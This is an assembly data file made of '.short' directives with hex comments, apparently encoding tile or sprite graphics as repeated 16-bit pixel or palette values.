.short 874 ## 0x36a
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 27241 ## 0x6a69
.short 259 ## 0x103
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 49675 ## 0xc20b
.short 56001 ## 0xdac1
.short 49601 ## 0xc1c1
.short 56001 ## 0xdac1
.short 49675 ## 0xc20b
.short 49626 ## 0xc1da
.short 49601 ## 0xc1c1
.short 18650 ## 0x48da
.short 49675 ## 0xc20b
.short 49601 ## 0xc1c1
.short 56001 ## 0xdac1
.short 20817 ## 0x5151
.short 49675 ## 0xc20b
.short 49601 ## 0xc1c1
.short 20954 ## 0x51da
.short 20817 ## 0x5151
.short 49667 ## 0xc203
.short 56001 ## 0xdac1
.short 20817 ## 0x5151
.short 20929 ## 0x51c1
.short 49667 ## 0xc203
.short 20954 ## 0x51da
.short 49489 ## 0xc151
.short 20817 ## 0x5151
.short 50435 ## 0xc503
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 2819 ## 0xb03
.short 2827 ## 0xb0b
.short 771 ## 0x303
.short 771 ## 0x303
.short 850 ## 0x352
.short 9739 ## 0x260b
.short 2854 ## 0xb26
.short 965 ## 0x3c5
.short 21318 ## 0x5346
.short 2819 ## 0xb03
.short 9510 ## 0x2526
.short 962 ## 0x3c2
.short 17992 ## 0x4648
.short 2899 ## 0xb53
.short 9739 ## 0x260b
.short 962 ## 0x3c2
.short 16456 ## 0x4048
.short 21318 ## 0x5346
.short 2827 ## 0xb0b
.short 965 ## 0x3c5
.short 20561 ## 0x5051
.short 17984 ## 0x4640
.short 2899 ## 0xb53
.short 965 ## 0x3c5
.short 20817 ## 0x5151
.short 16448 ## 0x4040
.short 21062 ## 0x5246
.short 962 ## 0x3c2
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 962 ## 0x3c2
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 19787 ## 0x4d4b
.short 19789 ## 0x4d4d
.short 18251 ## 0x474b
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44545 ## 0xae01
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 38145 ## 0x9501
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 769 ## 0x301
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44801 ## 0xaf01
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44545 ## 0xae01
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 38145 ## 0x9501
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 769 ## 0x301
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44801 ## 0xaf01
.short 405 ## 0x195
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 259 ## 0x103
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 431 ## 0x1af
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 430 ## 0x1ae
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 405 ## 0x195
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 259 ## 0x103
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 431 ## 0x1af
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 430 ## 0x1ae
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 13827 ## 0x3603
.short 31286 ## 0x7a36
.short 13621 ## 0x3535
.short 13178 ## 0x337a
.short 33283 ## 0x8203
.short 51845 ## 0xca85
.short 32900 ## 0x8084
.short 33152 ## 0x8180
.short 15875 ## 0x3e03
.short 55940 ## 0xda84
.short 32388 ## 0x7e84
.short 12158 ## 0x2f7e
.short 15875 ## 0x3e03
.short 55940 ## 0xda84
.short 32388 ## 0x7e84
.short 12158 ## 0x2f7e
.short 15875 ## 0x3e03
.short 55940 ## 0xda84
.short 32388 ## 0x7e84
.short 12158 ## 0x2f7e
.short 32515 ## 0x7f03
.short 55940 ## 0xda84
.short 33668 ## 0x8384
.short 16003 ## 0x3e83
.short 13059 ## 0x3303
.short 45178 ## 0xb07a
.short 13877 ## 0x3635
.short 13110 ## 0x3336
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 5140 ## 0x1414
.short 4369 ## 0x1111
.short 4369 ## 0x1111
.short 785 ## 0x311
.short 16001 ## 0x3e81
.short 15422 ## 0x3c3e
.short 13107 ## 0x3333
.short 829 ## 0x33d
.short 10799 ## 0x2a2f
.short 12335 ## 0x302f
.short 771 ## 0x303
.short 827 ## 0x33b
.short 10799 ## 0x2a2f
.short 12335 ## 0x302f
.short 771 ## 0x303
.short 827 ## 0x33b
.short 10799 ## 0x2a2f
.short 12335 ## 0x302f
.short 771 ## 0x303
.short 827 ## 0x33b
.short 12350 ## 0x303e
.short 12606 ## 0x313e
.short 771 ## 0x303
.short 827 ## 0x33b
.short 11827 ## 0x2e33
.short 11827 ## 0x2e33
.short 771 ## 0x303
.short 814 ## 0x32e
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 12806 ## 0x3206
.short 12980 ## 0x32b4
.short 1837 ## 0x72d
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 1031 ## 0x407
.short 300 ## 0x12c
.short 2305 ## 0x901
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 12806 ## 0x3206
.short 12980 ## 0x32b4
.short 2093 ## 0x82d
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33841 ## 0x8431
.short 34010 ## 0x84da
.short 16003 ## 0x3e83
.short 11793 ## 0x2e11
.short 819 ## 0x333
.short 11779 ## 0x2e03
.short 1 ## 0x1
.short 12340 ## 0x3034
.short 895 ## 0x37f
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 12350 ## 0x303e
.short 895 ## 0x37f
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 32025 ## 0x7d19
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 52249 ## 0xcc19
.short 32135 ## 0x7d87
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 41497 ## 0xa219
.short 34721 ## 0x87a1
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 41497 ## 0xa219
.short 41366 ## 0xa196
.short 41634 ## 0xa2a2
.short 41634 ## 0xa2a2
.short 41497 ## 0xa219
.short 38550 ## 0x9696
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 38424 ## 0x9618
.short 38550 ## 0x9696
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 38412 ## 0x960c
.short 38550 ## 0x9696
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 38412 ## 0x960c
.short 38550 ## 0x9696
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 6525 ## 0x197d
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 23943 ## 0x5d87
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 34685 ## 0x877d
.short 32125 ## 0x7d7d
.short 41634 ## 0xa2a2
.short 41634 ## 0xa2a2
.short 32135 ## 0x7d87
.short 32125 ## 0x7d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44545 ## 0xae01
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 38145 ## 0x9501
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 769 ## 0x301
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44801 ## 0xaf01
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44545 ## 0xae01
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 38145 ## 0x9501
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 769 ## 0x301
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 44801 ## 0xaf01
.short 405 ## 0x195
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 259 ## 0x103
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 431 ## 0x1af
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 430 ## 0x1ae
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 405 ## 0x195
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 259 ## 0x103
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 431 ## 0x1af
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 430 ## 0x1ae
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 798 ## 0x31e
.short 13614 ## 0x352e
.short 31408 ## 0x7ab0
.short 13110 ## 0x3336
.short 256 ## 0x100
.short 33841 ## 0x8431
.short 34010 ## 0x84da
.short 16003 ## 0x3e83
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 12806 ## 0x3206
.short 34263 ## 0x85d7
.short 16003 ## 0x3e83
.short 11827 ## 0x2e33
.short 819 ## 0x333
.short 11779 ## 0x2e03
.short 7171 ## 0x1c03
.short 12350 ## 0x303e
.short 895 ## 0x37f
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 12350 ## 0x303e
.short 895 ## 0x37f
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 33840 ## 0x8430
.short 34010 ## 0x84da
.short 12158 ## 0x2f7e
.short 256 ## 0x100
.short 34097 ## 0x8531
.short 34266 ## 0x85da
.short 16003 ## 0x3e83
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 10799 ## 0x2a2f
.short 830 ## 0x33e
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 12350 ## 0x303e
.short 895 ## 0x37f
.short 15107 ## 0x3b03
.short 1 ## 0x1
.short 796 ## 0x31c
.short 13614 ## 0x352e
.short 13599 ## 0x351f
.short 13110 ## 0x3336
.short 13825 ## 0x3601
.short 13622 ## 0x3536
.short 11539 ## 0x2d13
.short 13946 ## 0x367a
.short 33281 ## 0x8201
.short 51845 ## 0xca85
.short 32900 ## 0x8084
.short 33152 ## 0x8180
.short 15873 ## 0x3e01
.short 55940 ## 0xda84
.short 32388 ## 0x7e84
.short 12158 ## 0x2f7e
.short 15873 ## 0x3e01
.short 55940 ## 0xda84
.short 32388 ## 0x7e84
.short 12158 ## 0x2f7e
.short 15873 ## 0x3e01
.short 55940 ## 0xda84
.short 32388 ## 0x7e84
.short 12158 ## 0x2f7e
.short 32513 ## 0x7f01
.short 55940 ## 0xda84
.short 33668 ## 0x8384
.short 16003 ## 0x3e83
.short 13057 ## 0x3301
.short 46202 ## 0xb47a
.short 13946 ## 0x367a
.short 13110 ## 0x3336
.short 11827 ## 0x2e33
.short 819 ## 0x333
.short 11779 ## 0x2e03
.short 7683 ## 0x1e03
.short 13878 ## 0x3636
.short 13107 ## 0x3333
.short 13107 ## 0x3333
.short 819 ## 0x333
.short 16001 ## 0x3e81
.short 15422 ## 0x3c3e
.short 13107 ## 0x3333
.short 829 ## 0x33d
.short 10799 ## 0x2a2f
.short 12335 ## 0x302f
.short 771 ## 0x303
.short 827 ## 0x33b
.short 10799 ## 0x2a2f
.short 12335 ## 0x302f
.short 771 ## 0x303
.short 827 ## 0x33b
.short 10799 ## 0x2a2f
.short 12335 ## 0x302f
.short 771 ## 0x303
.short 827 ## 0x33b
.short 12350 ## 0x303e
.short 12606 ## 0x313e
.short 771 ## 0x303
.short 827 ## 0x33b
.short 11827 ## 0x2e33
.short 2611 ## 0xa33
.short 257 ## 0x101
.short 261 ## 0x105
.short 38423 ## 0x9617
.short 38550 ## 0x9696
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 38524 ## 0x967c
.short 38550 ## 0x9696
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 38524 ## 0x967c
.short 38550 ## 0x9696
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 38524 ## 0x967c
.short 41366 ## 0xa196
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 38524 ## 0x967c
.short 55969 ## 0xdaa1
.short 38561 ## 0x96a1
.short 38550 ## 0x9696
.short 40828 ## 0x9f7c
.short 41434 ## 0xa1da
.short 38550 ## 0x9696
.short 38550 ## 0x9696
.short 55933 ## 0xda7d
.short 41676 ## 0xa2cc
.short 41634 ## 0xa2a2
.short 41634 ## 0xa2a2
.short 32102 ## 0x7d66
.short 32125 ## 0x7d7d
.short 32125 ## 0x7d7d
.short 23933 ## 0x5d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 24158 ## 0x5e5e
.short 24158 ## 0x5e5e
.short 32162 ## 0x7da2
.short 32125 ## 0x7d7d
.short 38550 ## 0x9696
.short 38550 ## 0x9696
.short 34721 ## 0x87a1
.short 32125 ## 0x7d7d
.short 38550 ## 0x9696
.short 38550 ## 0x9696
.short 41366 ## 0xa196
.short 32135 ## 0x7d87
.short 41634 ## 0xa2a2
.short 41634 ## 0xa2a2
.short 41634 ## 0xa2a2
.short 26316 ## 0x66cc
.short 6425 ## 0x1919
.short 6425 ## 0x1919
.short 6425 ## 0x1919
.short 4633 ## 0x1219
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 771 ## 0x303
.short 0 ## 0x0
.short 0 ## 0x0
.short 46849 ## 0xb701
.short 55996 ## 0xdabc
.short 0 ## 0x0
.short 256 ## 0x100
.short 47799 ## 0xbab7
.short 54490 ## 0xd4da
.short 0 ## 0x0
.short 47873 ## 0xbb01
.short 56021 ## 0xdad5
.short 56026 ## 0xdada
.short 0 ## 0x0
.short 769 ## 0x301
.short 771 ## 0x303
.short 771 ## 0x303
.short 256 ## 0x100
.short 28627 ## 0x6fd3
.short 55919 ## 0xda6f
.short 30682 ## 0x77da
.short 256 ## 0x100
.short 29914 ## 0x74da
.short 56026 ## 0xdada
.short 926 ## 0x39e
.short 54017 ## 0xd301
.short 884 ## 0x374
.short 40410 ## 0x9dda
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 47316 ## 0xb8d4
.short 297 ## 0x129
.short 0 ## 0x0
.short 0 ## 0x0
.short 18874 ## 0x49ba
.short 10569 ## 0x2949
.short 1 ## 0x1
.short 0 ## 0x0
.short 54484 ## 0xd4d4
.short 50364 ## 0xc4bc
.short 443 ## 0x1bb
.short 0 ## 0x0
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 30583 ## 0x7777
.short 28535 ## 0x6f77
.short 55919 ## 0xda6f
.short 1 ## 0x1
.short 771 ## 0x303
.short 38772 ## 0x9774
.short 55915 ## 0xda6b
.short 1 ## 0x1
.short 771 ## 0x303
.short 29699 ## 0x7403
.short 27788 ## 0x6c8c
.short 467 ## 0x1d3
.short 0 ## 0x0
.short 0 ## 0x0
.short 769 ## 0x301
.short 771 ## 0x303
.short 0 ## 0x0
.short 256 ## 0x100
.short 49342 ## 0xc0be
.short 49344 ## 0xc0c0
.short 0 ## 0x0
.short 48641 ## 0xbe01
.short 48574 ## 0xbdbe
.short 14906 ## 0x3a3a
.short 0 ## 0x0
.short 49153 ## 0xc001
.short 15037 ## 0x3abd
.short 15037 ## 0x3abd
.short 256 ## 0x100
.short 48830 ## 0xbebe
.short 48442 ## 0xbd3a
.short 14138 ## 0x373a
.short 256 ## 0x100
.short 15040 ## 0x3ac0
.short 14906 ## 0x3a3a
.short 14135 ## 0x3737
.short 256 ## 0x100
.short 48576 ## 0xbdc0
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 48641 ## 0xbe01
.short 15038 ## 0x3abe
.short 14138 ## 0x373a
.short 14138 ## 0x373a
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 259 ## 0x103
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 15037 ## 0x3abd
.short 15037 ## 0x3abd
.short 48573 ## 0xbdbd
.short 48442 ## 0xbd3a
.short 14906 ## 0x3a3a
.short 14906 ## 0x3a3a
.short 14906 ## 0x3a3a
.short 14906 ## 0x3a3a
.short 14135 ## 0x3737
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14906 ## 0x3a3a
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 769 ## 0x301
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 48442 ## 0xbd3a
.short 48442 ## 0xbd3a
.short 15037 ## 0x3abd
.short 48442 ## 0xbd3a
.short 48442 ## 0xbd3a
.short 14906 ## 0x3a3a
.short 14906 ## 0x3a3a
.short 14906 ## 0x3a3a
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14906 ## 0x3a3a
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 259 ## 0x103
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 48573 ## 0xbdbd
.short 48442 ## 0xbd3a
